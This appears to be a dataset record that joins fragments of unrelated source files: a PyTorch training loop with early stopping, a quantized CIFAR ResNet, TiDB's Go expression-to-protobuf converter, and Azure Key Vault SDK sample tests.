# view(-1) is enough to flatten it to 1-D
# (view(b_size*f_size) would also work)
labels = labels.view(-1)
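# Shape sketch (the frame count is illustrative): with batch_size = 5 and
# 300 padded frames per utterance, outputs goes from [5, 300, dim_out] to
# [1500, dim_out] and labels from [5, 300] to [1500], which is exactly
# what CrossEntropyLoss expects.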
# Compute the loss
loss = criterion(outputs, labels)
# In the training phase, run backpropagation
# and update the model parameters
if phase == 'train':
# Compute the gradients
loss.backward()
# Update the parameters
# with the optimizer
optimizer.step()
# Accumulate the loss
total_loss += loss.item()
# Count the number of processed utterances
total_utt += b_size
#
# Compute the frame-level error rate
#
# Get the predicted labels
_, hyp = torch.max(outputs, 1)
# Remove the frames whose labels were
# padded with pad_index
hyp = hyp[labels != pad_index]
ref = labels[labels != pad_index]
# Count the frames where the predicted and
# reference labels differ
error = (hyp != ref).sum()
# Accumulate the number of erroneous frames
total_error += error
# Accumulate the total number of frames
total_frames += len(ref) | #
# Divide the accumulated loss by the number of processed utterances
epoch_loss = total_loss / total_utt
# Print to the screen and write to the log file
print(' %s loss: %f' \
% (phase, epoch_loss))
log_file.write('%.6f\t' % (epoch_loss))
# Append to the history
loss_history[phase].append(epoch_loss)
# Divide the total number of erroneous frames by the
# total number of frames to get the error rate
epoch_error = 100.0 * total_error \
/ total_frames
# Print to the screen and write to the log file
print(' %s error rate: %f %%' \
% (phase, epoch_error))
log_file.write('%.6f\t' % (epoch_error))
# Append to the history
error_history[phase].append(epoch_error)
#
# Processing specific to the validation phase
#
if phase == 'validation':
if epoch == 0 or best_loss > epoch_loss:
# If the loss reaches a new minimum,
# save the current model
best_loss = epoch_loss
torch.save(model.state_dict(),
output_dir+'/best_model.pt')
best_epoch = epoch
# Reset the counter used for
# the early stopping check
counter_for_early_stop = 0
else:
# The minimum has not been updated,
if epoch+1 >= lr_decay_start_epoch:
# and the epoch has reached
# lr_decay_start_epoch
if counter_for_early_stop+1 \
>= early_stop_threshold:
# If the minimum has not been updated
# for at least the threshold number of epochs,
# set the early stopping flag
early_stop_flag = True
else:
# If the early stopping condition
# has not been met, decay the
# learning rate and keep training
if lr_decay_factor < 1.0:
for i, param_group \
in enumerate(\
optimizer.param_groups):
if i == 0:
lr = param_group['lr']
dlr = lr_decay_factor \
* lr
print(' (Decay '\
'learning rate:'\
' %f -> %f)' \
% (lr, dlr))
log_file.write(\
'(Decay learning'\
' rate: %f -> %f)'\
% (lr, dlr))
param_group['lr'] = dlr
# Increase the counter used for
# the early stopping check
counter_for_early_stop += 1
#
# All epochs finished
# Save the trained model and write the log
#
print('---------------Summary'\
'------------------')
log_file.write('\n---------------Summary'\
'------------------\n')
# Save the model of the final epoch
torch.save(model.state_dict(),
os.path.join(output_dir,'final_model.pt'))
print('Final epoch model -> %s/final_model.pt' \
% (output_dir))
log_file.write('Final epoch model ->'\
' %s/final_model.pt\n' \
% (output_dir))
# Information about the final epoch
for phase in ['train', 'validation']:
# Print the loss of the final epoch
print(' %s loss: %f' \
% (phase, loss_history[phase][-1]))
log_file.write(' %s loss: %f\n' \
% (phase, loss_history[phase][-1]))
# Print the error rate of the final epoch
print(' %s error rate: %f %%' \
% (phase, error_history[phase][-1]))
log_file.write(' %s error rate: %f %%\n' \
% (phase, error_history[phase][-1]))
# Information about the best epoch
# (the epoch with the lowest validation loss)
print('Best epoch model (%d-th epoch)'\
' -> %s/best_model.pt' \
% (best_epoch+1, output_dir))
log_file.write('Best epoch model (%d-th epoch)'\
' -> %s/best_model.pt\n' \
% (best_epoch+1, output_dir))
for phase in ['train', 'validation']:
# Print the loss of the best epoch
print(' %s loss: %f' \
% (phase, loss_history[phase][best_epoch]))
log_file.write(' %s loss: %f\n' \
% (phase, loss_history[phase][best_epoch]))
# Print the error rate of the best epoch
print(' %s error rate: %f %%' \
% (phase, error_history[phase][best_epoch]))
log_file.write(' %s error rate: %f %%\n' \
% (phase, error_history[phase][best_epoch]))
# Save the loss history as a learning-curve plot
fig1 = plt.figure()
for phase in ['train', 'validation']:
plt.plot(loss_history[phase],
label=phase+' loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
fig1.legend()
fig1.savefig(output_dir+'/loss.png')
# Save the error-rate history as a plot
fig2 = plt.figure()
for phase in ['train', 'validation']:
plt.plot(error_history[phase],
label=phase+' error')
plt.xlabel('Epoch')
plt.ylabel('Error [%]')
fig2.legend()
fig2.savefig(output_dir+'/error.png')
# Close the log file
log_file.close() |
#
# One epoch of this phase has finished
# Compute the loss and error rate, save the model, etc.
resnet_cifar_quant.py | """
ResNet on CIFAR10
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from .quant import ClippedReLU, int_conv2d, int_linear
from .mpdr_score import get_mpdr_score
import math
class DownsampleA(nn.Module):
def __init__(self, nIn, nOut, stride):
super(DownsampleA, self).__init__()
assert stride == 2
self.avg = nn.AvgPool2d(kernel_size=1, stride=stride)
def forward(self, x):
x = self.avg(x)
return torch.cat((x, x.mul(0)), 1)
class ResNetBasicblock(nn.Module):
expansion = 1
"""
ResNet basicblock (https://github.com/facebook/fb.resnet.torch/blob/master/models/resnet.lua)
"""
def __init__(self, inplanes, planes, stride=1, downsample=None, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
super(ResNetBasicblock, self).__init__()
# self.conv_a = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False) # quantization
self.conv_a = int_conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=push) # quantization
self.bn_a = nn.BatchNorm2d(planes)
self.relu1 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True) # Clipped ReLU function 4 - bits
# self.relu1 = nn.ReLU(inplace=True)
self.conv_b = int_conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=push) # quantization
# self.conv_b = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False) # quantization
self.bn_b = nn.BatchNorm2d(planes)
self.relu2 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True) # Clipped ReLU function 4 - bits
self.downsample = downsample
def forward(self, x):
residual = x
basicblock = self.conv_a(x)
basicblock = self.bn_a(basicblock)
basicblock = self.relu1(basicblock)
basicblock = self.conv_b(basicblock)
basicblock = self.bn_b(basicblock)
if self.downsample is not None:
residual = self.downsample(x)
return self.relu2(residual + basicblock)
class CifarResNet(nn.Module):
"""
ResNet optimized for the Cifar dataset, as specified in
https://arxiv.org/abs/1512.03385.pdf
"""
def __init__(self, depth, num_classes, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
""" Constructor
Args:
depth: number of layers.
num_classes: number of classes
base_width: base width
"""
super(CifarResNet, self).__init__()
block = ResNetBasicblock
# Model type specifies number of layers for CIFAR-10 and CIFAR-100 model
assert (depth - 2) % 6 == 0, 'depth should be one of 20, 32, 44, 56, 110'
layer_blocks = (depth - 2) // 6
print ('CifarResNet : Depth : {} , Layers for each block : {}'.format(depth, layer_blocks))
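# Example (follows directly from the formula above): depth = 20 gives
# (20 - 2) // 6 = 3 basic blocks in each of the three stages.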
self.num_classes = num_classes
self.ch_group = ch_group
# self.conv_1_3x3 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.conv_1_3x3 = int_conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False) # skip the push process for the first conv layer
self.relu0 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True)
self.bn_1 = nn.BatchNorm2d(16)
self.inplanes = 16
self.stage_1 = self._make_layer(block, 16, layer_blocks, 1, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.stage_2 = self._make_layer(block, 32, layer_blocks, 2, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.stage_3 = self._make_layer(block, 64, layer_blocks, 2, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.avgpool = nn.AvgPool2d(8)
self.classifier = int_linear(64*block.expansion, num_classes, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False) # skip the push process for the last fc layer
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
#m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
init.kaiming_normal_(m.weight)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
int_conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv_1_3x3(x)
x = self.relu0(self.bn_1(x))
x = self.stage_1(x)
x = self.stage_2(x)
x = self.stage_3(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
return self.classifier(x) | def get_group_val(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = m.weight
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.pow(2).sum(dim=1).pow(1/2)
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_thre(self, ratio):
grp_val = self.get_group_val()
# grp_mean = grp_val.mean()
# threshold = ratio * grp_mean
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
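# Sizing sketch (the layer shape is illustrative, not taken from this file):
# for a 3x3 conv with 32 input and 64 output channels and ch_group = 16,
# get_group_val() contributes 64 * 32 // 16 = 128 group norms, each computed
# over 16 * 3 * 3 = 144 weights; get_global_thre(ratio) then returns the
# value sitting at the ratio-quantile of all such norms across the network.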
def get_group_mp(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = m.weight
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.abs().mean(dim=1)
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_mp_thre(self, ratio):
grp_val = self.get_group_mp()
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
def get_group_mpdr(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = get_mpdr_score(m.weight)
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.mean(dim=1) # compute the mean of the mpdr score
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_mpdr_thre(self, ratio):
grp_val = self.get_group_mpdr()
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
class resnet20_quant:
base=CifarResNet
args = list()
kwargs = {'depth': 20}
class resnet32_quant:
base=CifarResNet
args = list()
kwargs = {'depth': 32} | |
expr_to_pb.go | // Copyright 2016 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package expression
import (
"github.com/ngaut/log"
"github.com/pingcap/tidb/ast"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/mysql"
"github.com/pingcap/tidb/sessionctx/variable"
"github.com/pingcap/tidb/util/codec"
"github.com/pingcap/tidb/util/types"
"github.com/pingcap/tipb/go-tipb"
)
// ExpressionsToPB converts expression to tipb.Expr.
func ExpressionsToPB(sc *variable.StatementContext, exprs []Expression, client kv.Client) (pbExpr *tipb.Expr, pushed []Expression, remained []Expression) {
pc := pbConverter{client: client, sc: sc}
for _, expr := range exprs {
v := pc.exprToPB(expr)
if v == nil {
remained = append(remained, expr)
continue
}
pushed = append(pushed, expr)
if pbExpr == nil {
pbExpr = v
} else {
// Merge multiple converted pb expressions into a CNF.
pbExpr = &tipb.Expr{
Tp: tipb.ExprType_And,
Children: []*tipb.Expr{pbExpr, v}}
}
}
return
}
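// Illustrative example (the expressions a, b and c are hypothetical): if all
// three can be converted, the returned pbExpr is And(And(a, b), c), pushed
// holds a, b and c, and remained is empty; any expression that cannot be
// converted is appended to remained instead.
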
// ExpressionsToPBList converts expressions to tipb.Expr list for new plan.
func ExpressionsToPBList(sc *variable.StatementContext, exprs []Expression, client kv.Client) (pbExpr []*tipb.Expr) {
pc := pbConverter{client: client, sc: sc}
for _, expr := range exprs {
v := pc.exprToPB(expr)
pbExpr = append(pbExpr, v)
}
return
}
type pbConverter struct {
client kv.Client
sc *variable.StatementContext
}
func (pc pbConverter) exprToPB(expr Expression) *tipb.Expr {
switch x := expr.(type) {
case *Constant:
return pc.datumToPBExpr(x.Value)
case *Column:
return pc.columnToPBExpr(x)
case *ScalarFunction:
return pc.scalarFuncToPBExpr(x)
}
return nil
}
func (pc pbConverter) datumToPBExpr(d types.Datum) *tipb.Expr {
var tp tipb.ExprType
var val []byte
switch d.Kind() {
case types.KindNull:
tp = tipb.ExprType_Null
case types.KindInt64:
tp = tipb.ExprType_Int64
val = codec.EncodeInt(nil, d.GetInt64())
case types.KindUint64:
tp = tipb.ExprType_Uint64
val = codec.EncodeUint(nil, d.GetUint64())
case types.KindString:
tp = tipb.ExprType_String
val = d.GetBytes()
case types.KindBytes:
tp = tipb.ExprType_Bytes
val = d.GetBytes()
case types.KindFloat32:
tp = tipb.ExprType_Float32
val = codec.EncodeFloat(nil, d.GetFloat64())
case types.KindFloat64:
tp = tipb.ExprType_Float64
val = codec.EncodeFloat(nil, d.GetFloat64())
case types.KindMysqlDuration:
tp = tipb.ExprType_MysqlDuration
val = codec.EncodeInt(nil, int64(d.GetMysqlDuration().Duration))
case types.KindMysqlDecimal:
tp = tipb.ExprType_MysqlDecimal
val = codec.EncodeDecimal(nil, d)
default:
return nil
}
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
return &tipb.Expr{Tp: tp, Val: val}
}
func (pc pbConverter) columnToPBExpr(column *Column) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_ColumnRef)) {
return nil
}
switch column.GetType().Tp {
case mysql.TypeBit, mysql.TypeSet, mysql.TypeEnum, mysql.TypeGeometry, mysql.TypeUnspecified:
return nil
}
if pc.client.IsRequestTypeSupported(kv.ReqTypeDAG, kv.ReqSubTypeBasic) {
return &tipb.Expr{
Tp: tipb.ExprType_ColumnRef,
Val: codec.EncodeInt(nil, int64(column.Index)),
}
}
id := column.ID
// A zero column ID is not a column from a table; it cannot be supported for now.
if id == 0 || id == -1 {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_ColumnRef,
Val: codec.EncodeInt(nil, id)}
}
func (pc pbConverter) scalarFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
switch expr.FuncName.L {
case ast.LT, ast.LE, ast.EQ, ast.NE, ast.GE, ast.GT,
ast.NullEQ, ast.In, ast.Like:
return pc.compareOpsToPBExpr(expr)
case ast.Plus, ast.Minus, ast.Mul, ast.Div, ast.Mod, ast.IntDiv:
return pc.arithmeticalOpsToPBExpr(expr)
case ast.AndAnd, ast.OrOr, ast.UnaryNot, ast.LogicXor:
return pc.logicalOpsToPBExpr(expr)
case ast.And, ast.Or, ast.BitNeg, ast.Xor, ast.LeftShift, ast.RightShift:
return pc.bitwiseFuncToPBExpr(expr)
case ast.Case, ast.Coalesce, ast.If, ast.Ifnull, ast.IsNull, ast.Nullif:
return pc.builtinFuncToPBExpr(expr)
default:
return nil
}
}
func (pc pbConverter) compareOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.LT:
tp = tipb.ExprType_LT
case ast.LE:
tp = tipb.ExprType_LE
case ast.EQ:
tp = tipb.ExprType_EQ
case ast.NE:
tp = tipb.ExprType_NE
case ast.GE:
tp = tipb.ExprType_GE
case ast.GT:
tp = tipb.ExprType_GT
case ast.NullEQ:
tp = tipb.ExprType_NullEQ
case ast.In:
return pc.inToPBExpr(expr)
case ast.Like:
return pc.likeToPBExpr(expr)
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) likeToPBExpr(expr *ScalarFunction) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_Like)) {
return nil
}
// Only patterns like 'abc', '%abc', 'abc%', '%abc%' can be converted to *tipb.Expr for now.
escape := expr.GetArgs()[2].(*Constant).Value
if escape.IsNull() || byte(escape.GetInt64()) != '\\' {
return nil
}
pattern, ok := expr.GetArgs()[1].(*Constant)
if !ok || pattern.Value.Kind() != types.KindString {
return nil
}
for i, b := range pattern.Value.GetString() {
switch b {
case '\\', '_':
return nil
case '%':
if i != 0 && i != len(pattern.Value.GetString())-1 {
return nil
}
}
}
expr0 := pc.exprToPB(expr.GetArgs()[0])
if expr0 == nil {
return nil
}
expr1 := pc.exprToPB(expr.GetArgs()[1])
if expr1 == nil {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_Like,
Children: []*tipb.Expr{expr0, expr1}}
}
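// Pattern examples (illustrative): 'abc', '%abc', 'abc%' and '%abc%' are
// convertible; patterns containing '_' or '\', or with '%' in the middle
// such as 'a%c', make this function return nil so the filter is evaluated
// by TiDB instead of being pushed down.
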
func (pc pbConverter) arithmeticalOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.Plus:
tp = tipb.ExprType_Plus
case ast.Minus:
tp = tipb.ExprType_Minus
case ast.Mul:
tp = tipb.ExprType_Mul
case ast.Div:
tp = tipb.ExprType_Div
case ast.Mod:
tp = tipb.ExprType_Mod
case ast.IntDiv:
tp = tipb.ExprType_IntDiv
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) logicalOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.AndAnd:
tp = tipb.ExprType_And
case ast.OrOr:
tp = tipb.ExprType_Or
case ast.LogicXor:
tp = tipb.ExprType_Xor
case ast.UnaryNot:
tp = tipb.ExprType_Not
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) bitwiseFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.And:
tp = tipb.ExprType_BitAnd
case ast.Or:
tp = tipb.ExprType_BitOr
case ast.Xor:
tp = tipb.ExprType_BitXor
case ast.LeftShift:
tp = tipb.ExprType_LeftShift
case ast.RightShift:
tp = tipb.ExprType_RighShift
case ast.BitNeg:
tp = tipb.ExprType_BitNeg
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) inToPBExpr(expr *ScalarFunction) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_In)) {
return nil
}
pbExpr := pc.exprToPB(expr.GetArgs()[0])
if pbExpr == nil {
return nil
}
listExpr := pc.constListToPB(expr.GetArgs()[1:])
if listExpr == nil {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_In,
Children: []*tipb.Expr{pbExpr, listExpr}}
}
func (pc pbConverter) constListToPB(list []Expression) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_ValueList)) {
return nil
}
// Only a list of *Constant values can be pushed down.
datums := make([]types.Datum, 0, len(list))
for _, expr := range list {
v, ok := expr.(*Constant)
if !ok {
return nil
}
d := pc.datumToPBExpr(v.Value)
if d == nil {
return nil
}
datums = append(datums, v.Value)
}
return pc.datumsToValueList(datums)
}
func (pc pbConverter) datumsToValueList(datums []types.Datum) *tipb.Expr {
// Don't push down a value list whose datums have different kinds.
prevKind := types.KindNull
for _, d := range datums {
if prevKind == types.KindNull {
prevKind = d.Kind()
}
if !d.IsNull() && d.Kind() != prevKind {
return nil
}
}
err := types.SortDatums(pc.sc, datums)
if err != nil {
log.Error(err.Error())
return nil
}
val, err := codec.EncodeValue(nil, datums...)
if err != nil {
log.Error(err.Error())
return nil
}
return &tipb.Expr{Tp: tipb.ExprType_ValueList, Val: val}
}
// GroupByItemToPB converts group by items to pb.
func GroupByItemToPB(sc *variable.StatementContext, client kv.Client, expr Expression) *tipb.ByItem {
pc := pbConverter{client: client, sc: sc}
e := pc.exprToPB(expr)
if e == nil {
return nil
}
return &tipb.ByItem{Expr: e}
}
// SortByItemToPB converts order by items to pb.
func SortByItemToPB(sc *variable.StatementContext, client kv.Client, expr Expression, desc bool) *tipb.ByItem |
// AggFuncToPBExpr converts aggregate function to pb.
func AggFuncToPBExpr(sc *variable.StatementContext, client kv.Client, aggFunc AggregationFunction) *tipb.Expr {
if aggFunc.IsDistinct() {
return nil
}
pc := pbConverter{client: client, sc: sc}
var tp tipb.ExprType
switch aggFunc.GetName() {
case ast.AggFuncCount:
tp = tipb.ExprType_Count
case ast.AggFuncFirstRow:
tp = tipb.ExprType_First
case ast.AggFuncGroupConcat:
tp = tipb.ExprType_GroupConcat
case ast.AggFuncMax:
tp = tipb.ExprType_Max
case ast.AggFuncMin:
tp = tipb.ExprType_Min
case ast.AggFuncSum:
tp = tipb.ExprType_Sum
case ast.AggFuncAvg:
tp = tipb.ExprType_Avg
}
if !client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
children := make([]*tipb.Expr, 0, len(aggFunc.GetArgs()))
for _, arg := range aggFunc.GetArgs() {
pbArg := pc.exprToPB(arg)
if pbArg == nil {
return nil
}
children = append(children, pbArg)
}
return &tipb.Expr{Tp: tp, Children: children}
}
func (pc pbConverter) builtinFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
switch expr.FuncName.L {
case ast.Case, ast.If, ast.Ifnull, ast.Nullif:
return pc.controlFuncsToPBExpr(expr)
case ast.Coalesce, ast.IsNull:
return pc.otherFuncsToPBExpr(expr)
default:
return nil
}
}
func (pc pbConverter) otherFuncsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.Coalesce:
tp = tipb.ExprType_Coalesce
case ast.IsNull:
tp = tipb.ExprType_IsNull
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) controlFuncsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.If:
tp = tipb.ExprType_If
case ast.Ifnull:
tp = tipb.ExprType_IfNull
case ast.Case:
tp = tipb.ExprType_Case
case ast.Nullif:
tp = tipb.ExprType_NullIf
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) convertToPBExpr(expr *ScalarFunction, tp tipb.ExprType) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
children := make([]*tipb.Expr, 0, len(expr.GetArgs()))
for _, arg := range expr.GetArgs() {
pbArg := pc.exprToPB(arg)
if pbArg == nil {
return nil
}
children = append(children, pbArg)
}
return &tipb.Expr{Tp: tp, Children: children}
}
| {
pc := pbConverter{client: client, sc: sc}
e := pc.exprToPB(expr)
if e == nil {
return nil
}
return &tipb.ByItem{Expr: e, Desc: desc}
} |
test_samples_keys.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from __future__ import print_function
import functools
import hashlib
import os
from azure.core.exceptions import ResourceNotFoundError
from devtools_testutils import ResourceGroupPreparer, KeyVaultPreparer
from keys_preparer import VaultClientPreparer
from keys_test_case import KeyVaultTestCase
def print(*args):
assert all(arg is not None for arg in args)
def test_create_key_client():
vault_url = "vault_url"
# pylint:disable=unused-variable
# [START create_key_client]
from azure.identity import DefaultAzureCredential
from azure.keyvault.keys import KeyClient
# Create a KeyClient using default Azure credentials
credential = DefaultAzureCredential()
key_client = KeyClient(vault_url, credential)
# [END create_key_client]
class TestExamplesKeyVault(KeyVaultTestCase):
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_key_crud_operations(self, vault_client, **kwargs):
from dateutil import parser as date_parse
key_client = vault_client.keys
# [START create_key]
from dateutil import parser as date_parse
expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
# create a key with optional arguments
key = key_client.create_key("key-name", "RSA-HSM", expires_on=expires_on)
print(key.name)
print(key.id)
print(key.key_type)
print(key.properties.expires_on)
# [END create_key]
# [START create_rsa_key]
key_size = 2048
key_ops = ["encrypt", "decrypt", "sign", "verify", "wrapKey", "unwrapKey"]
# create an rsa key with size specification
# RSA key can be created with default size of '2048'
key = key_client.create_rsa_key("key-name", hardware_protected=True, size=key_size, key_operations=key_ops)
print(key.id)
print(key.name)
print(key.key_type)
print(key.key_operations)
# [END create_rsa_key]
# [START create_ec_key]
key_curve = "P-256"
# create an EC (Elliptic curve) key with curve specification
# EC key can be created with default curve of 'P-256'
ec_key = key_client.create_ec_key("key-name", curve=key_curve)
print(ec_key.id)
print(ec_key.properties.version)
print(ec_key.key_type)
print(ec_key.key.crv)
# [END create_ec_key]
# [START get_key]
# get the latest version of a key
key = key_client.get_key("key-name")
# alternatively, specify a version
key_version = key.properties.version
key = key_client.get_key("key-name", key_version)
print(key.id)
print(key.name)
print(key.properties.version)
print(key.key_type)
print(key.properties.vault_url)
# [END get_key]
# [START update_key]
# update attributes of an existing key
expires_on = date_parse.parse("2050-01-02T08:00:00.000Z")
tags = {"foo": "updated tag"}
updated_key = key_client.update_key_properties(key.name, expires_on=expires_on, tags=tags)
print(updated_key.properties.version)
print(updated_key.properties.updated_on)
print(updated_key.properties.expires_on)
print(updated_key.properties.tags)
print(key.key_type)
# [END update_key]
# [START delete_key]
# delete a key
deleted_key_poller = key_client.begin_delete_key("key-name")
deleted_key = deleted_key_poller.result()
print(deleted_key.name)
# if the vault has soft-delete enabled, the key's deleted_date,
# scheduled purge date and recovery id are set
print(deleted_key.deleted_date)
print(deleted_key.scheduled_purge_date)
print(deleted_key.recovery_id)
# if you want to block until deletion is complete, call wait() on the poller
deleted_key_poller.wait()
# [END delete_key]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_key_list_operations(self, vault_client, **kwargs):
key_client = vault_client.keys
for i in range(4):
key_client.create_ec_key("key{}".format(i))
for i in range(4):
key_client.create_rsa_key("key{}".format(i))
# [START list_keys]
# get an iterator of keys
keys = key_client.list_properties_of_keys()
for key in keys:
print(key.id)
print(key.name)
# [END list_keys]
# [START list_properties_of_key_versions]
# get an iterator of a key's versions
key_versions = key_client.list_properties_of_key_versions("key-name")
for key in key_versions:
print(key.id)
print(key.name)
# [END list_properties_of_key_versions]
# [START list_deleted_keys]
# get an iterator of deleted keys (requires soft-delete enabled for the vault)
deleted_keys = key_client.list_deleted_keys()
for key in deleted_keys:
print(key.id)
print(key.name)
print(key.scheduled_purge_date)
print(key.recovery_id)
print(key.deleted_date)
# [END list_deleted_keys]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer()
@VaultClientPreparer()
def test_example_keys_backup_restore(self, vault_client, **kwargs):
key_client = vault_client.keys
created_key = key_client.create_key("keyrec", "RSA")
key_name = created_key.name
# [START backup_key]
# backup key
key_backup = key_client.backup_key(key_name)
# returns the raw bytes of the backed up key
print(key_backup)
# [END backup_key]
key_client.begin_delete_key(key_name).wait()
# [START restore_key_backup]
# restore a key backup
restored_key = key_client.restore_key_backup(key_backup)
print(restored_key.id)
print(restored_key.properties.version)
# [END restore_key_backup]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_keys_recover(self, vault_client, **kwargs):
| key_client = vault_client.keys
